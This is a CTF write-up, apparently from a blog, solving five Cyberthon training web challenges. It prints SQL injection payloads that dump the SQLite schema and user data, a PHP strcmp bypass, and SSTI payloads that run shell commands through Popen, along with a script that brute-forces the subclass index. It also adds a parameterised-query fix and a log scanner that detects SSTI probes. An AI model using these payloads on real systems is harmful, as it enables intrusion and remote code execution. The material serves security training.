Cyberthon Training | Cyberthon Independent Learning Web Challenges

Published on: April 13, 2025

5 min read · Posted by elitecollapsez

Challenge Details

Description: Solutions to the five web challenges
Category: Web Exploitation
Difficulty: Easy
Topics: SQL Injection, SSTI, PHP
Competition: Cyberthon Training
Author: elitecollapsez

Writeup

Cyberthon training writeups

Web

Web 1 - Pie for Flag

This challenge checks your knowledge of modifying requests. From the source code, we can see that a few conditions must be met before it gives the flag.

  1. It requires a POST request.
  2. It asks for the request header "I-Like" to have the value Pie.
  3. It asks for the request body field "Pi" to contain the first few digits of Pi, exactly as given in the code.

Using Burp Suite, we can craft the request:


The response will return the flag


Flag: CTFSG{53R10U5_P13_4DD1CT10N}

Web2 - The Waiting Game

This challenge tests your knowledge of HTTP cookies. HTTP cookies can be modified through the developer tools, in the Application tab. The challenge tells you that you can only retrieve the flag if the timestamp is one specific time: '1-1-2345 12:00:00 AM GMT+8'.

However, the cookie expects Unix time, so we convert the date with a short script or an online converter and get '11833833600'.
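As an added example (not part of the original write-up), the conversion done by script rather than a website: it parses the challenge's date string, applies the GMT+8 offset, and also shows the 8-hour error you get by treating the time as UTC.

```python
from datetime import datetime, timedelta, timezone


def ctf_time_to_unix(text: str) -> int:
    """Convert a string like '1-1-2345 12:00:00 AM GMT+8' (D-M-YYYY, 12-hour
    clock, fixed GMT offset in whole hours) to a Unix timestamp."""
    stamp, tz = text.rsplit(" ", 1)          # '1-1-2345 12:00:00 AM', 'GMT+8'
    if not tz.startswith("GMT"):
        raise ValueError(f"unsupported zone: {tz}")
    offset_hours = int(tz[3:] or "0")        # bare 'GMT' means +0
    naive = datetime.strptime(stamp, "%d-%m-%Y %I:%M:%S %p")  # 12:00 AM -> 00:00
    aware = naive.replace(tzinfo=timezone(timedelta(hours=offset_hours)))
    return int(aware.timestamp())


def naive_unix(text: str) -> int:
    """The common mistake: ignore the GMT+8 suffix and treat the time as UTC.
    For a +8 zone this lands 8 hours (28800 s) too late."""
    stamp = text.rsplit(" ", 1)[0]
    naive = datetime.strptime(stamp, "%d-%m-%Y %I:%M:%S %p")
    return int(naive.replace(tzinfo=timezone.utc).timestamp())


if __name__ == "__main__":
    target = "1-1-2345 12:00:00 AM GMT+8"
    print(ctf_time_to_unix(target))                        # 11833833600
    print(naive_unix(target) - ctf_time_to_unix(target))   # 28800
```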

Then we can simply send a request to the /flag endpoint with the cookie set:


The response will return the flag


Flag: CTFSG{1_W45_1MP4T13NT_50_1_T1M3_TR4V3LL3D}

Web3 - StoreMyFlag

The challenge description states that the challenge has a login system backed by SQLite and that the key concept is SQL injection. Hence, we have a rough direction: use SQL injection payloads to retrieve the flag.

Upon reaching the website, we can use a simple SQL payload, ' OR 1=1--, to check whether SQL injection exists. We receive "login successful", showing that SQL payloads work with no filter, blacklist or whitelist.

Now we need SQL injection to retrieve information, mainly using a UNION attack. I didn't think to select from sqlite_master first (the table that stores the metadata of the database) and decided to guess the users table instead. The payload is ' UNION SELECT username, password FROM users--


I got a couple of users and passwords other than the default john, but it is not very useful.

From this, we can tell that the UNION attack needs two columns of string type.

Running the payload ' UNION SELECT sql, null FROM sqlite_master-- retrieves the CREATE TABLE statements, giving us this:


In the users table there are four columns; the one we want to retrieve is ctf_flag:

' UNION SELECT ctf_flag, null FROM users--

Author notes: Looking back, I should probably have queried sqlite_master directly instead of guessing the users table, as guessing is not a very proper solution.
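Added example, not the challenge's code: a minimal SQLite login in Python with the write-up's two payloads run against both a string-built query and a parameterised one. The schema and row values are constructed stand-ins (four columns including ctf_flag, as the write-up describes; the flag is a placeholder).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, ctf_flag TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'john', 'hunter2', 'CTFSG{placeholder}')")
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> list:
    """Input is spliced into the SQL text, so a quote plus a -- comment rewrites the query."""
    query = (f"SELECT username, password FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(query).fetchall()


def login_safe(db: sqlite3.Connection, username: str, password: str) -> list:
    """Bound parameters travel as data; the query shape cannot change."""
    query = "SELECT username, password FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchall()


def demo() -> dict:
    """Run the write-up's first probe and its sqlite_master query through both versions."""
    db = make_db()
    probe = "' OR 1=1--"
    schema_leak = "' UNION SELECT sql, null FROM sqlite_master--"
    return {
        "vuln_probe": login_vulnerable(db, probe, "x"),     # every row: "login successful"
        "safe_probe": login_safe(db, probe, "x"),           # no such username: empty
        "vuln_schema": login_vulnerable(db, schema_leak, "x"),  # CREATE TABLE text leaks
        "safe_schema": login_safe(db, schema_leak, "x"),        # empty
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```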


Flag: CTFSG{0H_W0W_Y0U_F0UND_M3_G00D_J0B}

Web4 - Admins Only

This challenge is about PHP vulnerabilities (PHP being one of the most hated languages). Looking at the source code, we can identify a vulnerable use of the function strcmp().

strcmp() compares two strings and returns 0 if they are equal, <0 if the first is less than the second and >0 if it is greater.

To log in, we need strcmp() to return 0. However, this function has a weakness: when comparing values of two different data types, it also returns 0, e.g. comparing a string with an object.

Knowing this, we can send a request with username 'admin' and a password that is an object:


The response will return the flag:


Reference solution: https://danuxx.blogspot.com/2013/03/unauthorized-access-bypassing-php-strcmp.html

Flag: CTFSG{L3RN1NG_W31RD_L4NGU4G3_QU1RK5}

Web 5 - BrowserID

The challenge outputs information about your browser, namely the User-Agent. However, this information is rendered directly into the page, so it could be vulnerable. A simple test of {{ 7 * 7 }} that comes back as 49 proves it vulnerable to SSTI.

Using a normal payload to read flag.txt (as most CTF SSTI challenges require you to retrieve the flag from the file 'flag.txt'), the server returns an internal server error:

{{self.__init__.__globals__['os'].popen('cat flag.txt').read()}}


This could be due to measures blocking popen. We can build an alternative payload:

User-Agent: {{''.__class__.__mro__[1].__subclasses__()[]('cat flag.txt',shell=True,stdout=-1).communicate()[0]}}

We just need to know the index of Popen among all the subclasses, which we can find by brute force:

```python
import requests

url = 'http://chals.t.cyberthon25.ctf.sg:34021/'

for i in range(0, 500):  # Try the first 500 subclasses
    # Render only the class name at index i so the response tells us what lives there
    payload = f"{{{{''.__class__.__mro__[1].__subclasses__()[{i}].__name__}}}}"
    headers = {
        "User-Agent": payload
    }

    print(f"[+] Trying index {i}")
    response = requests.get(url, headers=headers)

    if "Popen" in response.text or "subprocess" in response.text:
        print(f"[!] Found something interesting at index {i}!")
        print(response.text)
        break
```

This reveals Popen at index 337:

[!] Found something interesting at index 337!


Final payload: {{''.__class__.__mro__[1].__subclasses__()[337]('cat flag.txt', shell=True, stdout=-1).communicate()[0]}}
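Added example, not from the write-up: the brute force above leaves a distinctive trail in server logs, a burst of near-identical User-Agent values from one client. This stdlib-only scanner parses constructed nginx combined-format lines (IPs and timestamps are made up) and classifies the User-Agent field by the template delimiters and dunder attributes the payloads on this page use.

```python
import re
from collections import Counter
from typing import Dict, Optional

# Constructed sample log: one normal browser, then the canary and two enumeration probes.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Apr/2025:10:00:01 +0800] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/125.0"
10.0.0.9 - - [13/Apr/2025:10:00:02 +0800] "GET / HTTP/1.1" 200 512 "-" "{{ 7 * 7 }}"
10.0.0.9 - - [13/Apr/2025:10:00:04 +0800] "GET / HTTP/1.1" 200 531 "-" "{{''.__class__.__mro__[1].__subclasses__()[336].__name__}}"
10.0.0.9 - - [13/Apr/2025:10:00:05 +0800] "GET / HTTP/1.1" 200 531 "-" "{{''.__class__.__mro__[1].__subclasses__()[337].__name__}}"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>.*)"$')
TEMPLATE_DELIM = re.compile(r"\{\{|\{%")                      # Jinja expression / statement
DUNDER = re.compile(r"__(class|mro|subclasses|globals|init|builtins)__")
SUBCLASS_INDEX = re.compile(r"__subclasses__\(\)\[(\d+)\]")  # the indexed walk above


def classify_ua(ua: str) -> Optional[str]:
    """Label a User-Agent value, or return None when it carries no template syntax."""
    if SUBCLASS_INDEX.search(ua):
        return "ssti-subclass-enumeration"
    if TEMPLATE_DELIM.search(ua) and DUNDER.search(ua):
        return "ssti-object-walk"
    if TEMPLATE_DELIM.search(ua):
        return "ssti-probe"          # e.g. the {{ 7 * 7 }} canary
    return None


def scan_log(text: str) -> Dict[str, Counter]:
    """Parse combined-format lines and count findings per client IP."""
    findings: Dict[str, Counter] = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                 # skip lines that are not in combined format
        label = classify_ua(m["ua"])
        if label:
            findings.setdefault(m["ip"], Counter())[label] += 1
    return findings


if __name__ == "__main__":
    for ip, counts in scan_log(SAMPLE_LOG).items():
        print(ip, dict(counts))      # 10.0.0.9 {'ssti-probe': 1, 'ssti-subclass-enumeration': 2}
```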


Flag: CTFSG{TH4T5_S0M3_W31RD_BR0WZ3R_Y0U_G0T_TH3R3}
